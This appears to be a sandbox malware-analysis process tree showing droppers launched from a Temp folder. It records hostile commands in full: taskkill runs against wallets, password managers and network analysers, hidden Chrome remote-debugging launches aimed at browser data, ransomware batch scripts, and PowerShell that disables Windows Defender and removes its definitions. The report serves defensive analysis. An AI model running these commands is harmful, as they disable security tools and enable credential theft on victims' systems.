C:\Windows\SYSTEM32\taskkill.exetaskkill /F /IM Exodus.exe5⤵
- Kills process with taskkill
PID:6256
-
-
C:\Windows\SYSTEM32\taskkill.exetaskkill /F /IM Guarda.exe5⤵
- Kills process with taskkill
PID:2208
-
-
C:\Windows\SYSTEM32\taskkill.exetaskkill /F /IM KeePassXC.exe5⤵
- Kills process with taskkill
PID:7852
-
-
C:\Windows\SYSTEM32\taskkill.exetaskkill /F /IM NordVPN.exe5⤵
- Kills process with taskkill
PID:5728
-
-
C:\Windows\SYSTEM32\taskkill.exetaskkill /F /IM OpenVPNConnect.exe5⤵
- Kills process with taskkill
PID:7756
-
-
C:\Windows\SYSTEM32\taskkill.exetaskkill /F /IM seamonkey.exe5⤵
- Kills process with taskkill
PID:7432
-
-
C:\Windows\SYSTEM32\taskkill.exetaskkill /F /IM Signal.exe5⤵
- Kills process with taskkill
PID:8136
-
-
C:\Windows\SYSTEM32\taskkill.exetaskkill /F /IM filezilla.exe5⤵
- Kills process with taskkill
PID:8440
-
-
C:\Windows\SYSTEM32\taskkill.exetaskkill /F /IM filezilla-server-gui.exe5⤵
- Kills process with taskkill
PID:7068
-
-
C:\Windows\SYSTEM32\taskkill.exetaskkill /F /IM keepassxc-proxy.exe5⤵
- Kills process with taskkill
PID:6276
-
-
C:\Windows\SYSTEM32\taskkill.exetaskkill /F /IM nordvpn-service.exe5⤵
- Kills process with taskkill
PID:11096
-
-
C:\Windows\SYSTEM32\taskkill.exetaskkill /F /IM steam.exe5⤵
- Kills process with taskkill
PID:3160
-
-
C:\Windows\SYSTEM32\taskkill.exetaskkill /F /IM walletd.exe5⤵
- Kills process with taskkill
PID:11204
-
-
C:\Windows\SYSTEM32\taskkill.exetaskkill /F /IM waterfox.exe5⤵
- Kills process with taskkill
PID:3088
-
-
C:\Windows\SYSTEM32\taskkill.exetaskkill /F /IM Discord.exe5⤵
- Kills process with taskkill
PID:10644
-
-
C:\Windows\SYSTEM32\taskkill.exetaskkill /F /IM DiscordCanary.exe5⤵
- Kills process with taskkill
PID:10764
-
-
C:\Windows\SYSTEM32\taskkill.exetaskkill /F /IM burp.exe5⤵
- Kills process with taskkill
PID:9248
-
-
C:\Windows\SYSTEM32\taskkill.exetaskkill /F /IM Ethereal.exe5⤵
- Kills process with taskkill
PID:5432
-
-
C:\Windows\SYSTEM32\taskkill.exetaskkill /F /IM EtherApe.exe5⤵
- Kills process with taskkill
PID:10292
-
-
C:\Windows\SYSTEM32\taskkill.exetaskkill /F /IM fiddler.exe5⤵
- Kills process with taskkill
PID:10056
-
-
C:\Windows\SYSTEM32\taskkill.exetaskkill /F /IM HTTPDebuggerSvc.exe5⤵
- Kills process with taskkill
PID:10168
-
-
C:\Windows\SYSTEM32\taskkill.exetaskkill /F /IM HTTPDebuggerUI.exe5⤵
- Kills process with taskkill
PID:1492
-
-
C:\Windows\SYSTEM32\taskkill.exetaskkill /F /IM snpa.exe5⤵
- Kills process with taskkill
PID:9556
-
-
C:\Windows\SYSTEM32\taskkill.exetaskkill /F /IM solarwinds.exe5⤵
- Kills process with taskkill
PID:2564
-
-
C:\Windows\SYSTEM32\taskkill.exetaskkill /F /IM tcpdump.exe5⤵
- Kills process with taskkill
PID:2476
-
-
C:\Windows\SYSTEM32\taskkill.exetaskkill /F /IM telerik.exe5⤵
- Kills process with taskkill
PID:6940
-
-
C:\Windows\SYSTEM32\taskkill.exetaskkill /F /IM wireshark.exe5⤵
- Kills process with taskkill
PID:11092
-
-
C:\Windows\SYSTEM32\taskkill.exetaskkill /F /IM winpcap.exe5⤵
- Kills process with taskkill
PID:10324
-
-
C:\Windows\SYSTEM32\taskkill.exetaskkill /F /IM telegram.exe5⤵
- Kills process with taskkill
PID:1156
-
-
C:\Windows\SYSTEM32\taskkill.exetaskkill /F /IM chrome.exe5⤵
- Kills process with taskkill
PID:9464
-
-
C:\Windows\SYSTEM32\taskkill.exetaskkill /F /IM chrome.exe5⤵
- Kills process with taskkill
PID:9632
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:/Program Files/Google/Chrome/Application/chrome.exe" --remote-debugging-port=9222 --profile-directory=Default --remote-allow-origins=* --window-position=10000,10000 --window-size=1,1 --disable-gpu --no-sandbox5⤵
- Uses browser remote debugging
PID:6212 -
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=123.0.6312.123 --initial-client-data=0x21c,0x220,0x224,0x1f8,0x228,0x7ff8702ccc40,0x7ff8702ccc4c,0x7ff8702ccc586⤵PID:11016
-
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:/Program Files/Google/Chrome/Application/chrome.exe" --remote-debugging-port=9222 --profile-directory=Default --remote-allow-origins=* --window-position=10000,10000 --window-size=1,1 --disable-gpu --no-sandbox5⤵
- Uses browser remote debugging
PID:10908 -
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=123.0.6312.123 --initial-client-data=0x21c,0x220,0x224,0x1f8,0x228,0x7ff8702ccc40,0x7ff8702ccc4c,0x7ff8702ccc586⤵PID:11068
-
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:/Program Files/Google/Chrome/Application/chrome.exe" --remote-debugging-port=9222 --profile-directory=Default --remote-allow-origins=* --window-position=10000,10000 --window-size=1,1 --disable-gpu --no-sandbox5⤵
- Uses browser remote debugging
PID:10256 -
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=123.0.6312.123 --initial-client-data=0x21c,0x220,0x224,0x1f8,0x228,0x7ff8702ccc40,0x7ff8702ccc4c,0x7ff8702ccc586⤵PID:4312
-
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:/Program Files/Google/Chrome/Application/chrome.exe" --remote-debugging-port=9222 --profile-directory=Default --remote-allow-origins=* --window-position=10000,10000 --window-size=1,1 --disable-gpu --no-sandbox5⤵
- Uses browser remote debugging
PID:6460 -
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=123.0.6312.123 --initial-client-data=0x21c,0x220,0x224,0x1f8,0x228,0x7ff8702ccc40,0x7ff8702ccc4c,0x7ff8702ccc586⤵PID:8480
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --no-sandbox --no-appcompat-clear --gpu-preferences=WAAAAAAAAADgAAAMAAAAAAAAAAAAAAAAAABgAAAAAAA4AAAAAAAAAAAAAAAEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAAAAAAAYAAAAAAAAAAgAAAAAAAAACAAAAAAAAAAIAAAAAAAAAA== --use-gl=angle --use-angle=swiftshader-webgl --field-trial-handle=1780,i,1465160697340797488,9050777418635154048,262144 --variations-seed-version=20241114-050102.167000 --mojo-platform-channel-handle=1920 /prefetch:26⤵PID:4792
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-sandbox --no-appcompat-clear --field-trial-handle=1968,i,1465160697340797488,9050777418635154048,262144 --variations-seed-version=20241114-050102.167000 --mojo-platform-channel-handle=1976 /prefetch:36⤵PID:7344
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --no-sandbox --no-appcompat-clear --field-trial-handle=2072,i,1465160697340797488,9050777418635154048,262144 --variations-seed-version=20241114-050102.167000 --mojo-platform-channel-handle=1984 /prefetch:86⤵PID:8256
-
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:/Program Files/Google/Chrome/Application/chrome.exe" --remote-debugging-port=9222 --profile-directory=Default --remote-allow-origins=* --window-position=10000,10000 --window-size=1,1 --disable-gpu --no-sandbox5⤵
- Uses browser remote debugging
PID:6160 -
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=123.0.6312.123 --initial-client-data=0x224,0x228,0x22c,0x200,0x230,0x7ff8702ccc40,0x7ff8702ccc4c,0x7ff8702ccc586⤵PID:2972
-
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:/Program Files/Google/Chrome/Application/chrome.exe" --remote-debugging-port=9222 --profile-directory=Default --remote-allow-origins=* --window-position=10000,10000 --window-size=1,1 --disable-gpu --no-sandbox5⤵
- Uses browser remote debugging
PID:9332 -
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=123.0.6312.123 --initial-client-data=0x21c,0x220,0x224,0x1f8,0x228,0x7ff8702ccc40,0x7ff8702ccc4c,0x7ff8702ccc586⤵PID:5140
-
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:/Program Files/Google/Chrome/Application/chrome.exe" --remote-debugging-port=9222 --profile-directory=Default --remote-allow-origins=* --window-position=10000,10000 --window-size=1,1 --disable-gpu --no-sandbox5⤵
- Uses browser remote debugging
PID:5492 -
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=123.0.6312.123 --initial-client-data=0x21c,0x220,0x224,0x1f8,0x228,0x7ff8702ccc40,0x7ff8702ccc4c,0x7ff8702ccc586⤵PID:6712
-
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:/Program Files/Google/Chrome/Application/chrome.exe" --remote-debugging-port=9222 --profile-directory=Default --remote-allow-origins=* --window-position=10000,10000 --window-size=1,1 --disable-gpu --no-sandbox5⤵
- Uses browser remote debugging
PID:8748 -
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=123.0.6312.123 --initial-client-data=0x21c,0x220,0x224,0x1f8,0x228,0x7ff8702ccc40,0x7ff8702ccc4c,0x7ff8702ccc586⤵PID:7216
-
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:/Program Files/Google/Chrome/Application/chrome.exe" --remote-debugging-port=9222 --profile-directory=Default --remote-allow-origins=* --window-position=10000,10000 --window-size=1,1 --disable-gpu --no-sandbox5⤵
- Uses browser remote debugging
PID:4064 -
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=123.0.6312.123 --initial-client-data=0x21c,0x220,0x224,0x1f8,0x228,0x7ff8702ccc40,0x7ff8702ccc4c,0x7ff8702ccc586⤵PID:10324
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\Files\CleanerV2.exe"C:\Users\Admin\AppData\Local\Temp\Files\CleanerV2.exe"3⤵PID:8224
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -u -p 8224 -s 1404⤵PID:8348
-
-
-
C:\Users\Admin\AppData\Local\Temp\Files\windowsexecutable.exe"C:\Users\Admin\AppData\Local\Temp\Files\windowsexecutable.exe"3⤵PID:7900
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 7900 -s 2284⤵
- Program crash
PID:8608
-
-
-
C:\Users\Admin\AppData\Local\Temp\Files\Update.exe"C:\Users\Admin\AppData\Local\Temp\Files\Update.exe"3⤵
- Suspicious behavior: AddClipboardFormatListener
- Suspicious use of SetWindowsHookEx
PID:5920 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5920 -s 12564⤵
- Program crash
PID:9836
-
-
-
C:\Users\Admin\AppData\Local\Temp\Files\random.exe"C:\Users\Admin\AppData\Local\Temp\Files\random.exe"3⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
PID:7048
-
-
C:\Users\Admin\AppData\Local\Temp\Files\wow.exe"C:\Users\Admin\AppData\Local\Temp\Files\wow.exe"3⤵
- Loads dropped DLL
- System Location Discovery: System Language Discovery
PID:7104
-
-
C:\Users\Admin\AppData\Local\Temp\Files\buildred.exe"C:\Users\Admin\AppData\Local\Temp\Files\buildred.exe"3⤵
- System Location Discovery: System Language Discovery
- Modifies system certificate store
PID:7556
-
-
C:\Users\Admin\AppData\Local\Temp\Files\Hive%20Ransomware.exe"C:\Users\Admin\AppData\Local\Temp\Files\Hive%20Ransomware.exe"3⤵
- System Location Discovery: System Language Discovery
PID:8548 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c hive.bat >NUL 2>NUL4⤵PID:3936
-
C:\Windows\SysWOW64\timeout.exetimeout 15⤵
- Delays execution with timeout.exe
PID:3000
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c shadow.bat >NUL 2>NUL4⤵PID:2312
-
-
-
C:\Users\Admin\AppData\Local\Temp\Files\softina.exe"C:\Users\Admin\AppData\Local\Temp\Files\softina.exe"3⤵
- System Location Discovery: System Language Discovery
PID:8328 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell.exe "Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp\Files\softina.exe"; Add-MpPreference -ExclusionProcess "softina.exe"; exit"4⤵
- Command and Scripting Interpreter: PowerShell
- System Location Discovery: System Language Discovery
PID:5256
-
-
-
C:\Users\Admin\AppData\Local\Temp\Files\ji2xlo1f.exe"C:\Users\Admin\AppData\Local\Temp\Files\ji2xlo1f.exe"3⤵PID:11308
-
-
C:\Users\Admin\AppData\Local\Temp\Files\svchost.exe"C:\Users\Admin\AppData\Local\Temp\Files\svchost.exe"3⤵PID:8460
-
-
C:\Users\Admin\AppData\Local\Temp\Files\666.exe"C:\Users\Admin\AppData\Local\Temp\Files\666.exe"3⤵PID:11884
-
-
C:\Users\Admin\AppData\Local\Temp\Files\MJPVgHw.exe"C:\Users\Admin\AppData\Local\Temp\Files\MJPVgHw.exe"3⤵PID:7868
-
C:\Windows\system32\svchost.exe"C:\Windows\system32\svchost.exe"4⤵PID:12008
-
-
C:\Windows\system32\msiexec.exe"C:\Windows\system32\msiexec.exe"4⤵PID:12000
-
-
C:\Windows\system32\audiodg.exe"C:\Windows\system32\audiodg.exe"4⤵PID:12044
-
-
-
C:\Users\Admin\AppData\Local\Temp\Files\aaa.exe"C:\Users\Admin\AppData\Local\Temp\Files\aaa.exe"3⤵PID:11248
-
-
C:\Users\Admin\AppData\Local\Temp\Files\xxxx.exe"C:\Users\Admin\AppData\Local\Temp\Files\xxxx.exe"3⤵PID:2800
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"4⤵PID:6180
-
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"4⤵PID:6392
-
-
-
C:\Users\Admin\AppData\Local\Temp\Files\Software.exe"C:\Users\Admin\AppData\Local\Temp\Files\Software.exe"3⤵PID:8752
-
C:\Users\Admin\AppData\Local\Temp\Files\Software.exe"C:\Users\Admin\AppData\Local\Temp\Files\Software.exe"4⤵PID:7144
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Files\Software.exe'"5⤵PID:6988
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Files\Software.exe'6⤵
- Command and Scripting Interpreter: PowerShell
PID:8124
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"5⤵PID:9148
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend6⤵
- Command and Scripting Interpreter: PowerShell
PID:8356
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "tasklist /FO LIST"5⤵PID:9528
-
C:\Windows\system32\tasklist.exetasklist /FO LIST6⤵
- Enumerates processes with tasklist
PID:6860
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"5⤵PID:10524
-
C:\Windows\System32\Wbem\WMIC.exewmic csproduct get uuid6⤵PID:8580
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\DriverDesc 2"5⤵PID:10744
-
C:\Windows\system32\reg.exeREG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\DriverDesc 26⤵PID:9260
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\ProviderName 2"5⤵PID:8084
-
C:\Windows\system32\reg.exeREG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\ProviderName 26⤵PID:9436
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"5⤵PID:10052
-
C:\Windows\System32\Wbem\WMIC.exewmic path win32_VideoController get name6⤵
- Detects videocard installed
PID:9220
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\Files\si.exe"C:\Users\Admin\AppData\Local\Temp\Files\si.exe"3⤵PID:10036
-
-
C:\Users\Admin\AppData\Local\Temp\Files\RambledMime.exe"C:\Users\Admin\AppData\Local\Temp\Files\RambledMime.exe"3⤵PID:8368
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"4⤵PID:9976
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeC:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe5⤵PID:6848
-
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeC:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe5⤵PID:9104
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\Files\main.exe"C:\Users\Admin\AppData\Local\Temp\Files\main.exe"3⤵PID:8268
-
C:\Users\Admin\AppData\Local\Temp\Files\main.exe"C:\Users\Admin\AppData\Local\Temp\Files\main.exe"4⤵PID:3592
-
-
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe"2⤵
- Drops file in Windows directory
- Enumerates system info in registry
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of WriteProcessMemory
PID:2212 -
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=123.0.6312.123 --initial-client-data=0x220,0x224,0x228,0x1fc,0x22c,0x7ff8702ccc40,0x7ff8702ccc4c,0x7ff8702ccc583⤵PID:1864
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --no-appcompat-clear --gpu-preferences=WAAAAAAAAADgAAAMAAAAAAAAAAAAAAAAAABgAAEAAAA4AAAAAAAAAAAAAAAEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAAAAAAAYAAAAAAAAAAgAAAAAAAAACAAAAAAAAAAIAAAAAAAAAA== --field-trial-handle=1932,i,7456749257601252261,8150907128232225428,262144 --variations-seed-version=20241022-180310.361000 --mojo-platform-channel-handle=1928 /prefetch:23⤵PID:3864
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=2160,i,7456749257601252261,8150907128232225428,262144 --variations-seed-version=20241022-180310.361000 --mojo-platform-channel-handle=2192 /prefetch:33⤵PID:1692
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=2184,i,7456749257601252261,8150907128232225428,262144 --variations-seed-version=20241022-180310.361000 --mojo-platform-channel-handle=2288 /prefetch:83⤵PID:3944
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --field-trial-handle=3164,i,7456749257601252261,8150907128232225428,262144 --variations-seed-version=20241022-180310.361000 --mojo-platform-channel-handle=3184 /prefetch:13⤵PID:2716
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --field-trial-handle=3208,i,7456749257601252261,8150907128232225428,262144 --variations-seed-version=20241022-180310.361000 --mojo-platform-channel-handle=3220 /prefetch:13⤵PID:3064
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --field-trial-handle=4544,i,7456749257601252261,8150907128232225428,262144 --variations-seed-version=20241022-180310.361000 --mojo-platform-channel-handle=4580 /prefetch:13⤵PID:1392
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=4808,i,7456749257601252261,8150907128232225428,262144 --variations-seed-version=20241022-180310.361000 --mojo-platform-channel-handle=4780 /prefetch:83⤵PID:1504
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.ProcessorMetrics --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=4948,i,7456749257601252261,8150907128232225428,262144 --variations-seed-version=20241022-180310.361000 --mojo-platform-channel-handle=4812 /prefetch:83⤵PID:4432
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=10 --field-trial-handle=4940,i,7456749257601252261,8150907128232225428,262144 --variations-seed-version=20241022-180310.361000 --mojo-platform-channel-handle=5084 /prefetch:13⤵PID:520
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=3736,i,7456749257601252261,8150907128232225428,262144 --variations-seed-version=20241022-180310.361000 --mojo-platform-channel-handle=4456 /prefetch:83⤵
- Modifies registry class
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of SetWindowsHookEx
PID:4188
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=3332,i,7456749257601252261,8150907128232225428,262144 --variations-seed-version=20241022-180310.361000 --mojo-platform-channel-handle=4460 /prefetch:83⤵
- Modifies registry class
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of SetWindowsHookEx
PID:5476
-
-
